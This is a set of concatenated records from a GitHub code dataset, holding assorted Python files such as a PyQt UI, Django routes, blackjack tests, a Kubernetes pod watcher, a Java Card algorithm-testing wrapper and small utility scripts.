self.delete_act.setGeometry(QtCore.QRect(330, 223, 111, 31))\n self.delete_act.setFont(styles.font_ltl_btn)\n self.delete_act.setText('Удалить')\n self.delete_act.setMouseTracking(False)\n self.delete_act.setStyleSheet(styles.for_btn)\n self.delete_act.setCheckable(False)\n self.delete_act.setObjectName(\"delete_act\")\n self.delete_act.setVisible(False)\n\n self.code = QtWidgets.QLineEdit(self.frame_2)\n self.code.setPlaceholderText('Метка класса')\n self.code.setGeometry(QtCore.QRect(0, 10, 191, 30))\n self.code.setFont(styles.default_font)\n self.code.setStyleSheet(styles.for_line_edit)\n self.code.setAlignment(QtCore.Qt.AlignCenter)\n self.code.setObjectName(\"code\")\n\n self.text = QtWidgets.QLineEdit(self.frame_2)\n self.text.setPlaceholderText('Текст команды')\n self.text.setGeometry(QtCore.QRect(0, 53, 420, 30))\n self.text.setFont(styles.default_font)\n self.text.setStyleSheet(styles.for_line_edit)\n self.text.setAlignment(QtCore.Qt.AlignCenter)\n self.text.setObjectName(\"text\")\n\n self.record_2 = 
QtWidgets.QCheckBox(self.frame_2)\n self.record_2.setGeometry(QtCore.QRect(220, 100, 201, 20))\n self.record_2.setFont(styles.font_check)\n self.record_2.setObjectName(\"record_2\")\n\n self.duration = QtWidgets.QLineEdit(self.frame_2)\n self.duration.setPlaceholderText('Длительность (сек.)')\n self.duration.setGeometry(QtCore.QRect(0, 95, 191, 30))\n self.duration.setFont(styles.default_font)\n self.duration.setStyleSheet(styles.for_line_edit)\n self.duration.setAlignment(QtCore.Qt.AlignCenter)\n self.duration.setObjectName(\"duration\")\n\n self.add_act_2 = QtWidgets.QPushButton(self.frame_2)\n self.add_act_2.setGeometry(QtCore.QRect(0, 140, 221, 30))\n self.add_act_2.setFont(styles.font_ltl_btn)\n self.add_act_2.setMouseTracking(False)\n self.add_act_2.setStyleSheet(styles.for_btn)\n self.add_act_2.setCheckable(False)\n self.add_act_2.setObjectName(\"add_act_2\")\n\n self.add_act_3 = QtWidgets.QPushButton(self.frame_2)\n self.add_act_3.setGeometry(QtCore.QRect(0, 140, 221, 30))\n self.add_act_3.setText('Отмена')\n self.add_act_3.setFont(styles.font_ltl_btn)\n self.add_act_3.setMouseTracking(False)\n self.add_act_3.setStyleSheet(styles.for_orange_btn)\n self.add_act_3.setCheckable(False)\n self.add_act_3.setObjectName(\"add_act_3\")\n self.add_act_3.setVisible(False)\n\n self.add_before = QtWidgets.QPushButton(self.frame_2)\n self.add_before.setGeometry(QtCore.QRect(0, 140, 221, 30))\n self.add_before.setFont(styles.font_ltl_btn)\n self.add_before.setMouseTracking(False)\n self.add_before.setText('Добавить действие перед')\n self.add_before.setVisible(False)\n self.add_before.setStyleSheet(styles.for_btn)\n self.add_before.setCheckable(False)\n self.add_before.setObjectName(\"add_before\")\n\n self.duration_rest = QtWidgets.QLineEdit(self.frame_2)\n self.duration_rest.setPlaceholderText('Длительность (сек.)')\n self.duration_rest.setVisible(False)\n self.duration_rest.setEnabled(True)\n self.duration_rest.setGeometry(QtCore.QRect(230, 140, 191, 30))\n self.duration_rest.setFont(styles.default_font)\n self.duration_rest.setStyleSheet(styles.for_line_edit)\n self.duration_rest.setAlignment(QtCore.Qt.AlignCenter)\n self.duration_rest.setObjectName(\"duration_rest\")\n\n self.tabWidget.addTab(self.scripts, \"\")\n self.record = QtWidgets.QWidget()\n self.record.setObjectName(\"record\")\n self.tabWidget.addTab(self.record, \"\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 996, 21))\n self.menubar.setObjectName(\"menubar\")\n self.menuFile = QtWidgets.QMenu(self.menubar)\n self.menuFile.setObjectName(\"menuFile\")\n self.menuSettings = QtWidgets.QMenu(self.menubar)\n self.menuSettings.setObjectName(\"menuSettings\")\n MainWindow.setMenuBar(self.menubar)\n self.actionImport = QtWidgets.QAction(MainWindow)\n self.actionImport.setObjectName(\"actionImport\")\n self.actionExport = QtWidgets.QAction(MainWindow)\n self.actionExport.setObjectName(\"actionExport\")\n self.menuFile.addAction(self.actionImport)\n self.menuFile.addAction(self.actionExport)\n self.menubar.addAction(self.menuFile.menuAction())\n self.menubar.addAction(self.menuSettings.menuAction())\n\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.all_scenes.setText(_translate(\"MainWindow\", 
\"Сценарии\"))\n self.add.setText(_translate(\"MainWindow\", \"Добавить\"))\n self.add_scene.setText(_translate(\"MainWindow\", \"Добавление сценария\"))\n self.add_act.setText(_translate(\"MainWindow\", \"Новое действие\"))\n self.save.setText(_translate(\"MainWindow\", \"Сохранить\"))\n self.record_2.setText(_translate(\"MainWindow\", \"Записывать данные на шаге\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.scripts), _translate(\"MainWindow\", \"Сценарии\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.record), _translate(\"MainWindow\", \"Запись данных\"))\n self.menuFile.setTitle(_translate(\"MainWindow\", \"File\"))\n self.menuSettings.setTitle(_translate(\"MainWindow\", \"Settings\"))\n self.actionImport.setText(_translate(\"MainWindow\", \"Import\"))\n self.actionExport.setText(_translate(\"MainWindow\", \"Export\"))\n","repo_name":"messageann/DataRecorder","sub_path":"Project/other/ui_old.py","file_name":"ui_old.py","file_ext":"py","file_size_in_byte":14199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1590084801","text":"from django.urls import re_path\nfrom .views import *\napp_name = 'oauth'\n\nurlpatterns = [\n # 获取QQ登录链接\n re_path(r'qq/login/$', QQAuthURLView.as_view()),\n # QQ登录成功回调\n re_path (r'oauth_callback.html/', QQAuthUserView.as_view()),\n\n]","repo_name":"Kaplc/MeiDuo","sub_path":"meiduo_project/meiduo_project/apps/oauth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74256670273","text":"import pytest\nimport os\nimport sys\n\nROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\")\nsys.path.append(os.path.join(ROOT, \"src\"))\nfrom simulator import hard_policy, soft_policy, split_policy, betting_policy\nfrom blackjack import (\n Actions,\n Cards,\n Deck,\n Player,\n resolve_player_action,\n Hand,\n PlayerResultTypes,\n resolve_dealer_action,\n DealerResultTypes,\n play,\n resolve_environment,\n parallel_processing,\n)\nimport numpy as np\n\n\ndef test_overall_play():\n\n wager_amts = [1, 1, 1, 1, 1, 1, 4, 8, 16]\n ranges = [-3, -2, -1, 0, 0, 1, 2, 3]\n betting_policy = (wager_amts, ranges)\n\n player = Player(\n bankroll=100,\n hard_policy=hard_policy,\n soft_policy=soft_policy,\n split_policy=split_policy,\n betting_policy=betting_policy,\n )\n deck = Deck()\n # first hand player wins and wins 1 count is now 4\n cards_1 = [\n Cards.TEN,\n Cards.THREE,\n Cards.TEN,\n Cards.FOUR,\n Cards.THREE,\n Cards.FOUR,\n Cards.TWO,\n Cards.FOUR,\n ]\n cards_2 = [\n Cards.TEN,\n Cards.THREE,\n Cards.TEN,\n Cards.FOUR,\n Cards.JACK,\n Cards.ACE,\n Cards.TEN,\n Cards.TEN,\n ]\n # second hand player wagers 16 and wins 16*1.5 = 24\n deck.set_cards(cards_2 + cards_1)\n\n resolve_environment(player, deck, 8, 1, 0.001)\n assert player.get_bankroll() == 101\n assert deck.get_count() == 4\n assert player.calculate_wager(deck.get_true_count()) == 16\n resolve_environment(player, deck, 8, 1, 0.001)\n assert player.get_bankroll() == 125\n\n\ndef test_parallel():\n player = Player(\n bankroll=10000,\n hard_policy=hard_policy,\n soft_policy=soft_policy,\n split_policy=split_policy,\n betting_policy=betting_policy,\n )\n output = parallel_processing(player=player, iterations=100, n_samples=10)\n assert len(output) == 
10\n","repo_name":"yjs1210/cardcounting","sub_path":"tests/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74673521155","text":"import traceback\r\nimport json\r\nimport os, sys, time\r\nimport uuid\r\n####################################\r\ndef configurationReader():\r\n try:\r\n settings = {}\r\n f = open('config', 'r')\r\n mode = f.readline().strip()\r\n print('MITTARISTO BACKEND APPLICATION RUNNING IN MODE: ', mode)\r\n configuration = json.load(open(\"app_config.json\", \"r\"))\r\n for key, value in configuration.items():\r\n if key == mode:\r\n settings['APP_DB_USER'] = value['DB_USER']\r\n settings['APP_DB_PWD'] = value['DB_PWD']\r\n settings['APP_DB_NAME'] = value['DB_NAME']\r\n settings['APP_DB_PORT'] = value['DB_PORT']\r\n settings['APP_DB_HOST'] = value['DB_HOST']\r\n settings['APP_OS_PWD'] = value['OS_PWD']\r\n settings['APP_OS_REPORT_DIR'] = value['OS_REPORT_DIR']\r\n settings['APP_FE_URL'] = value['APP_FE_URL']\r\n settings['APP_BE_PUBLIC_IP'] = value['APP_BE_PUBLIC_IP']\r\n settings['APP_BE_LOCAL_IP'] = value['APP_BE_LOCAL_IP']\r\n settings['APP_BE_PUBLIC_PORT'] = value['APP_BE_PUBLIC_PORT']\r\n settings['APP_BE_LOCAL_PORT'] = value['APP_BE_LOCAL_PORT']\r\n settings['MAIL'] = False\r\n if \"prod\" in key:\r\n settings['MAIL'] = True\r\n # print('APP_FE_URL: ', APP_FE_URL)\r\n return settings\r\n except:\r\n print(traceback.format_exc())\r\n print(\"Config file not found. Mode - test\")\r\n","repo_name":"ajesh12k/Angular8FE-PythonBE","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38553345275","text":"import dash_daq as daq\nfrom dash import Output, Input, html\nfrom dash.exceptions import PreventUpdate\nfrom dash_bootstrap_templates import ThemeSwitchAIO\n\nfrom consts import TagIds, Theme, TagFields, NavButtons, InputModes, Icons\nfrom dash_setup import app\nfrom mappings.handlers import EXTRA, TYPES\nfrom mappings.tabs import PAGES\nfrom realtime_data import realtime\nfrom tabs.control_panel import create_control_panel\n\n\n@app.callback(Output(TagIds.Layout.EXTRA, TagFields.CHILDREN), Input(TagIds.LOCATION, TagFields.PATH))\ndef render_extra_content_by_input_mode(url):\n return EXTRA.get(url.strip('/'), [])\n\n\n@app.callback(Output(TagIds.Layout.CONTENT, TagFields.CHILDREN), Input(TagIds.TABS, TagFields.VALUE))\ndef render_content_by_tab(tab):\n return PAGES[tab][TagIds.Layout.CONTENT].render()\n\n\n@app.callback(Output(TagIds.Layout.THEME, TagFields.CHILDREN),\n Input(ThemeSwitchAIO.ids.switch(TagIds.THEME), TagFields.VALUE))\ndef change_theme(theme):\n Theme.DAQ_THEME['dark'] = theme\n content = [create_control_panel(), html.Div(id=TagIds.Layout.CONTENT, className='flex column')]\n return daq.DarkThemeProvider(theme=Theme.DAQ_THEME, children=content)\n\n\n@app.callback(Output(TagIds.CLOCK, TagFields.CHILDREN),\n Input(TagIds.Intervals.SYNC_DATA, TagFields.INTERVAL), prevent_initial_call=True)\ndef update_timer(intervals):\n timestamp = 'Timer: '\n if realtime.database.is_not_empty():\n timestamp += realtime.database.time_gap()\n return Icons.Css.TIMER, timestamp\n\n\n@app.callback(\n [[Output(f\"{mode}_label\", TagFields.CHILDREN), Output(f\"{mode}_link\", TagFields.STYLE)] for mode in InputModes.ALL],\n Input(TagIds.LOCATION, TagFields.PATH), 
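# two triggers: the URL path and the periodic data-sync interval\n    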
Input(TagIds.Intervals.SYNC_DATA, TagFields.INTERVAL),\n prevent_initial_call=True\n)\ndef display_connection_status(path, *args):\n path = path.strip('/')\n output = []\n if not realtime.in_types():\n raise PreventUpdate\n current = TYPES[realtime.thread.handler_name].current\n for input_mode in InputModes.ALL:\n option = check_status(input_mode, path)\n message = NavButtons.OPTIONS[option]['message'].format(current=current)\n output.append([message, {'background-color': NavButtons.OPTIONS[option]['color']}])\n return output\n\n\ndef check_status(input_mode, path):\n option = NavButtons.DEFAULT\n if input_mode == path:\n option = NavButtons.CLICKED\n if realtime.thread.events.Finish.connect.is_set():\n option = NavButtons.CONNECTED\n elif realtime.thread.events.disconnect.is_set():\n option = NavButtons.DISCONNECTED\n return option\n","repo_name":"noga-malka/Dash","sub_path":"callbacks/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3016505782","text":"from kubernetes import client, config, watch\r\nfrom KubernetesTest.Tools import EventHandle\r\n\r\nconfig.kube_config.load_kube_config(config_file=\"kubeconfig.yaml\")\r\n\r\n# 获取API的CoreV1Api版本对象\r\nv1 = client.CoreV1Api()\r\n\r\nw = watch.Watch()\r\nfor event in w.stream(v1.list_pod_for_all_namespaces):\r\n if event['object'].metadata.namespace == 'app01':\r\n EventHandle(event)\r\n","repo_name":"jichengxi/study","sub_path":"tools/KubernetesTest/PodInfo.py","file_name":"PodInfo.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28665521223","text":"from Fund import Fund\nfrom FundVisualizer import FundVisualizer, setup_mpl\nimport requests\nimport multiprocessing\nfrom datetime import date, timedelta\n\nclass FundUtil:\n def __init__(self, start_date, end_date):\n setup_mpl()\n self.viz = FundVisualizer()\n self.session = requests.Session()\n self.start_date = start_date\n self.end_date = end_date\n\nsession = requests.Session()\nstart_date = None\nend_date = None\n\ndef init_process():\n global session\n global start_date\n global end_date\n # fund_util = FundUtil(start_date=date.today()-timedelta(days=120), end_date=str(date.today()))\n start_date = start_date=date.today()-timedelta(days=120)\n end_date=str(date.today())\n\ndef get_fund(fund_id):\n global session\n global start_date\n global end_date\n fund = Fund(fund_id, start_date, end_date)\n fund.update_data(session=session)\n return fund\n\ndef fetch_data(fund_id_list):\n with multiprocessing.Pool(initializer=init_process) as pool:\n fund_sets = pool.map(get_fund,\n fund_id_list)\n return fund_sets\n\nif __name__ == '__main__':\n fund_id_list = [\n '519002',\n '161818',\n '001069'\n ]\n fetch_data(fund_id_list)\n ","repo_name":"AutoRecursive/qianjinqiu","sub_path":"Fund/FundSet.py","file_name":"FundSet.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17770066269","text":"import csv\r\n\r\ndef read_cell(x, y):\r\n with open('merged dataset.csv', 'r') as f:\r\n reader = csv.reader(f)\r\n y_count = 0\r\n for n in reader:\r\n if y_count == y:\r\n cell = n[x]\r\n return cell\r\n y_count += 1\r\n\r\nf = open('merged dataset.csv', 'r')\r\nfile = open('final merged dataset.csv', 'w')\r\n\r\nfor i in range(842):\r\n conflict = read_cell(1, 
i)\r\n if 'Interpersonal' in conflict and 'Religion' not in conflict:\r\n conflict = 'Interpersonal'\r\n elif 'Religion' in conflict and 'Interpersonal' not in conflict:\r\n conflict = 'Religion'\r\n else:\r\n conflict = 'Interpersonal and Religion'\r\n file.write(str(read_cell(0, i))+','+str(conflict)+','+str(read_cell(2, i))+','+str(read_cell(3, i))+',\"'+str(read_cell(4, i))+'\",'+str(read_cell(5, i))+','+str(read_cell(6, i))+'\\n')\r\n\r\nfile.close()","repo_name":"Saravanac5a/partition-analysis","sub_path":"conflicts.py","file_name":"conflicts.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42549081966","text":"import heapq\r\n\r\nclass Solution(object):\r\n def kthSmallest(self, matrix, k):\r\n\r\n \"\"\"\r\n :type matrix: List[List[int]]\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n h = []\r\n i = 0\r\n\r\n for l in matrix:\r\n\r\n for element in l:\r\n\r\n heapq.heappush(h, (element, i))\r\n i += 1\r\n\r\n for i in range(k):\r\n val = heapq.heappop(h)\r\n\r\n return val[0]\r\n\r\nr = Solution()\r\n\r\nres = r.kthSmallest([\r\n [1,5,9],\r\n [10,11,13],\r\n [12,13,15]\r\n], 8)\r\n\r\nprint (res)\r\n\r\n\r\n\r\n","repo_name":"nmaswood/leetcode","sub_path":"finished/378-kthSmallestElementInASortedMatrix.py","file_name":"378-kthSmallestElementInASortedMatrix.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"42665357158","text":"import os\nimport pathlib\nfrom abc import ABC, abstractmethod\nfrom typing import List, final\n\nfrom overrides import overrides, EnforceOverrides\n\nfrom scrutiny.config import Paths\nfrom scrutiny.interfaces import ToolWrapper\nfrom scrutiny.javacard.modules.algperformance import AlgPerformance\nfrom scrutiny.javacard.modules.algvariable import AlgVariable\nfrom scrutiny.javacard.modules.jcalgtest import JCAlgTestModule, \\\n PerformanceResult, SupportResult\nfrom scrutiny.utils import execute_cmd\nfrom scrutiny.javacard.modules.algsupport import AlgSupport\n\nSUPPORT_STRING = \"ALGSUPPORT\"\nPERFORMANCE_STRING = \"DATAFIXED\"\nVARIABLE_STRING = \"DATADEPEND\"\n\nDISCARD = [\n \"This file was generated by AlgTest utility\",\n \"This is very specific feature\",\n \"algorithm_name\"\n]\n\nTEST_INFO = [\n \"Tested and provided by\",\n \"Execution date\",\n \"AlgTest\",\n \"Used reader\",\n \"Card ATR\",\n \"Card name\",\n \"Card provider\",\n \"Used protocol\",\n \"High-power mode supported\",\n \"Package_AID_test\",\n \"JavaCard support version\",\n \"Total\"\n]\n\n\ndef install_jcalgtest_applet(force=False):\n \"\"\"\n Installs JCAlgTest applet\n :param force: also remove previously installed JCAlgTest applets\n \"\"\"\n if force:\n execute_cmd(\"java -jar \" + Paths.GPPRO + \" -uninstall \" +\n Paths.JCALGTEST_305)\n for applet in Paths.JCALGTEST_CAPS:\n cmd_line = \"java -jar \" + Paths.GPPRO + \" -install \" + applet\n if execute_cmd(cmd_line) == 0:\n break\n\n\ndef parse_common_line(module: JCAlgTestModule, line: str) -> bool:\n \"\"\"\n Parses common lines found in all JCAlgTest output types\n :param line: parsed line\n :param module: JCAlgTest module\n :return True if line contained common data\n \"\"\"\n\n if line == \"\" or \";\" not in line \\\n or any([d in line for d in DISCARD]):\n return True\n\n data = line.split(\";\")\n\n if any([line.startswith(info) for info in TEST_INFO]):\n module.test_info[data[0]] = data[1].strip()\n return 
True\n\n if line.startswith(\"JCSystem\"):\n module.jcsystem[data[0]] = data[1]\n return True\n\n if line.startswith(\"APDU\"):\n module.apdu[data[0]] = data[1]\n return True\n\n if line.startswith(\"CPLC\"):\n module.cplc[data[0]] = data[1]\n return True\n\n return False\n\n\ndef parse_performance_block(lines: List[str], position: int,\n result: PerformanceResult):\n \"\"\"\n Parse performance block in JCAlgTest performance data\n\n Example of the parsed data:\n method name:; TYPE_DES LENGTH_DES ALG_DES_CBC_NOPAD Cipher_update()\n measurement config:;appletPrepareINS;31;appletMeasureINS;43;config;00...\n baseline measurements (ms):;154,00;151,00;152,00;152,00;151,00;\n baseline stats (ms):;avg:;152,00;min:;151,00;max:;154,00;\n operation raw measurements (ms):;986,00;989,00;989,00;988,00;988,00;\n operation stats (ms/op):;avg op:;19,76;min op:;19,72;max op:;19,78;\n operation info:;data length;256;total iterations;250;total invocations;250;\n \"\"\"\n\n conf, base, base_stats, op, op_stats, op_info = \\\n ([col.strip() for col in lines[position + i].split(\";\")]\n for i in range(1, 7))\n\n if conf[0] != \"measurement config:\":\n result.error = \";\".join(conf)\n return\n\n result.prepare_ins = int(conf[2], 16)\n result.measure_ins = int(conf[4], 16)\n result.config = conf[6]\n\n if base[0] != \"baseline measurements (ms):\":\n result.error = \";\".join(base)\n return\n\n result.baseline.extend([float(v.replace(\",\", \".\")) for v in base[1:-1]])\n\n if base_stats[0] != \"baseline stats (ms):\":\n result.error = \";\".join(base_stats)\n return\n\n # Implement control?\n\n if op[0] != \"operation raw measurements (ms):\":\n result.error = \";\".join(op)\n return\n\n result.operation.extend([float(v.replace(\",\", \".\")) for v in op[1:-1]])\n\n if op_stats[0] != \"operation stats (ms/op):\":\n result.error = \";\".join(op_stats)\n return\n\n # Implement control?\n\n if op_info[0] != \"operation info:\":\n result.error = \";\".join(op_stats)\n return\n\n result.data_length = int(op_info[2])\n result.iterations = int(op_info[4])\n result.invocations = int(op_info[6])\n\n\nclass JCAlgTest(ToolWrapper, ABC, EnforceOverrides):\n \"\"\"SCRUTINY JCAlgTest ToolWrapper\"\"\"\n\n JCALGTEST_BIN = \"java -jar \" + Paths.JCALGTEST\n CAPS = Paths.JCALGTEST_CAPS\n\n def __init__(self, card_name, force_mode=False, install=True):\n super().__init__(card_name, force_mode)\n self.outfile = None\n if install:\n install_jcalgtest_applet()\n\n @final\n def find_outfile(self, search_string):\n \"\"\"\n Find JCAlgTest output file\n :param search_string: JCAlgTest mode string\n \"\"\"\n if self.outfile:\n return self.outfile\n for file in os.listdir(self.get_outpath(\"\")):\n if search_string in file:\n self.outfile = file\n return self.outfile\n\n @abstractmethod\n def get_outfile(self):\n \"\"\"\n Get JCAlgTest output file name\n :return: Output file name if it exists\n \"\"\"\n\n @final\n def run_jcalgtest(self, args, search_string):\n \"\"\"\n Run JCAlgTest\n :param args: JCAlgTest arguments\n :param search_string: JCAlgTest mode string\n :return: return code\n \"\"\"\n cmd_line = self.JCALGTEST_BIN + \" \" + \" \".join(args)\n if self.get_outfile():\n print(\"Skipping \" + cmd_line + \" (results found).\")\n return 0\n\n retcode = execute_cmd(cmd_line)\n\n # if existing measurement is already present in results folder, replace it with newer one\n for file in os.listdir(\"./results/\" + self.device_name + \"/\"):\n if search_string in file and self.device_name in file:\n dest = self.get_outpath(file)\n 
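# moving the file with os.replace is disabled below; only the file name is recorded\n                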
#os.replace(file, dest)\n self.outfile = file\n break\n\n return retcode\n\n @classmethod\n def parse_specific_lines(cls, line: str, module: JCAlgTestModule,\n lines: List[str], position: int) -> None:\n \"\"\"\n Parses lines from different types of JCAlgTest results\n :param line starting line\n :param module: JCAlgTest module\n :param lines: file content\n :param position: line to parse\n :return:\n \"\"\"\n\n @classmethod\n @final\n def parse_loop(cls, module, filename) -> None:\n \"\"\"Performs general parsing loop for JCAlgTest result files\"\"\"\n\n with open(filename, \"r\") as f:\n lines = f.readlines()\n\n for i, line in enumerate(lines):\n\n line = line.strip()\n\n if parse_common_line(module, line):\n continue\n\n cls.parse_specific_lines(line, module, lines, i)\n\n\nclass JCAlgTestSupport(JCAlgTest):\n \"\"\"JCAlgTest support ToolWrapper\"\"\"\n @overrides\n def get_outfile(self):\n return self.find_outfile(SUPPORT_STRING)\n\n @overrides\n def run(self):\n return self.run_jcalgtest(['-fresh', '-op', 'ALG_SUPPORT_BASIC', '-cardname', self.device_name,\n '-outpath', './results/' + self.device_name + '/'], SUPPORT_STRING)\n\n @overrides\n def parse(self):\n alg_support = AlgSupport()\n modules = [alg_support]\n self.parse_loop(alg_support, self.get_outpath(self.outfile))\n return modules\n\n @classmethod\n @overrides\n def parse_specific_lines(cls, line: str, module: AlgSupport,\n lines: List[str], position: int) -> None:\n\n result = SupportResult()\n data = [col.strip() for col in line.split(\";\")]\n\n if data[1] == \"yes\":\n result.support = True\n elif data[1] == \"no\":\n result.support = False\n else:\n result.error = data[1]\n result.support = False\n\n if len(data) >= 3 and data[2] != \"\":\n if \"sec\" in data[2]:\n data[2] = data[2].split(\" \")[0]\n result.time_elapsed = float(data[2].replace(\",\", \".\"))\n if len(data) >= 6:\n result.persistent_memory = int(data[3])\n result.ram_deselect = int(data[4])\n result.ram_reset = int(data[5])\n\n if data[0] not in module.support:\n module.support[data[0]] = result\n\n\nclass JCAlgTestSupportExtended(JCAlgTest):\n \"\"\"JCAlgTest extended support ToolWrapper\"\"\"\n\n @overrides\n def get_outfile(self):\n return self.find_outfile(SUPPORT_STRING)\n\n @overrides\n def run(self):\n return self.run_jcalgtest(['-fresh', '-op', 'ALG_SUPPORT_EXTENDED', '-cardname', self.device_name,\n '-outpath', './results/' + self.device_name + '/'], SUPPORT_STRING)\n\n @overrides\n def parse(self):\n return JCAlgTestSupport.parse(self)\n\n @classmethod\n @overrides\n def parse_specific_lines(cls, line: str, module: AlgSupport,\n lines: List[str], position: int) -> None:\n return JCAlgTestSupport.parse_specific_lines(line, module, lines, position)\n\n\nclass JCAlgTestPerformance(JCAlgTest):\n \"\"\"JCAlgTest performance ToolWrapper\"\"\"\n\n @overrides\n def get_outfile(self):\n return self.find_outfile(PERFORMANCE_STRING)\n\n @overrides\n def run(self):\n return self.run_jcalgtest([], PERFORMANCE_STRING)\n\n @overrides\n def parse(self):\n alg_performance = AlgPerformance()\n modules = [alg_performance]\n self.parse_loop(alg_performance, self.get_outpath(self.outfile))\n return modules\n\n @classmethod\n @overrides\n def parse_specific_lines(cls, line: str, module: JCAlgTestModule,\n lines: List[str], position: int) -> None:\n\n if not line.startswith(\"method name:\"):\n return\n\n result = PerformanceResult()\n key = line.split(\";\")[1].strip()\n module.add_result(key, result)\n\n parse_performance_block(lines, position, result)\n\n\nclass 
JCAlgTestVariable(JCAlgTestPerformance):\n \"\"\"JCAlgTest variable performance ToolWrapper\"\"\"\n\n @overrides\n def get_outfile(self):\n return self.find_outfile(VARIABLE_STRING)\n\n @overrides\n def run(self):\n return self.run_jcalgtest([], VARIABLE_STRING)\n\n @overrides\n def parse(self):\n alg_variable = AlgVariable()\n modules = [alg_variable]\n self.parse_loop(alg_variable, self.get_outpath(self.outfile))\n return modules\n","repo_name":"crocs-muni/scrutiny","sub_path":"scrutiny/javacard/toolwrappers/jcalgtest.py","file_name":"jcalgtest.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"4098084777","text":"# Python code to illustrate \n# reduce() with lambda() \n# to get sum of a list \nfrom functools import reduce\nli = [5, 8, 10, 20, 50, 100] \nsum = reduce((lambda x, y: x + y), li) \nprint (sum) \n# 193\n# @###################################3\n# Python program to Find the Number \n# Occurring Odd Number of Times \n# using Lambda expression and reduce function \n\nfrom functools import reduce\n\ndef oddTimes(input): \n\t# write lambda expression and apply \n\t# reduce function over input list \n\t# until single value is left \n\t# expression reduces value of a ^ b into single value \n\t# a starts from 0 and b from 1 \n\t# ((((((1 ^ 2)^3)^2)^3)^1)^3) \n\tprint (reduce(lambda a, b: a ^ b, input)) \n\n# Driver program \nif __name__ == \"__main__\": \n\tinput = [1, 2, 3, 2, 3, 1, 3] \n\toddTimes(input) \n\n# ========>>>out : 3\n","repo_name":"pydevcasts/python-sy","sub_path":"function/redu_map_filter/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28928178267","text":"import os\nimport json\nimport random\nimport subprocess\nimport uuid\n\nfrom argparse import ArgumentParser\nfrom codenamize import codenamize\nfrom dataset_toolbox.src.tools.common import find_filepaths, get_list, mkdirp\nfrom simulants.description import SimulantDescriptionGenerator, update_layers\n\n\ndef make_a_simulant(sim_info, out_dir):\n sim_id = codenamize(str(uuid.uuid4()), 2, 0)\n simulant = SimulantDescriptionGenerator(0, sim_id, sim_info)\n info = simulant.desriptor()\n\n with open(os.path.join(out_dir, '{}.json'.format(sim_id)), 'w') as outfile:\n json.dump(info, outfile, indent=2)\n\n return sim_id\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--out_dir', type=str, help='where simulant jsons will go',\n default='tmp/jsons')\n parser.add_argument('--sim_dir', type=str, help='where simulant blends files should go',\n default='tmp/simulants')\n parser.add_argument('--textures', type=str, help='directory of texture pngs',\n default='data/patterns')\n parser.add_argument('--pose_list', type=str, help='list of poses to use',\n default='data/mocap_pose_list.txt')\n parser.add_argument('--hairs', type=str, help='base directory of hair models',\n default='data/hairs')\n parser.add_argument('--clothes', type=str, help='base directory of clothing models',\n default='data/clothes')\n parser.add_argument('--scene_json', type=str, help='where the scene json will go', required=True)\n parser.add_argument('--scene_dir', type=str, help='if saved, where scene blend files should end up', required=True)\n parser.add_argument('--backgrounds', type=str, help='directory of backround hdr images',\n default='data/backgrounds')\n 
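The oddTimes record above relies on the XOR fold, and the reason it works deserves a line: x ^ x == 0 and x ^ 0 == x, and XOR is associative and commutative, so every value occurring an even number of times cancels regardless of order. A quick check:

```python
from functools import reduce

values = [1, 2, 3, 2, 3, 1, 3]
# Pairs cancel: 1^1 == 0, 2^2 == 0, one 3^3 == 0, leaving the unpaired 3.
assert reduce(lambda a, b: a ^ b, values) == 3
```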
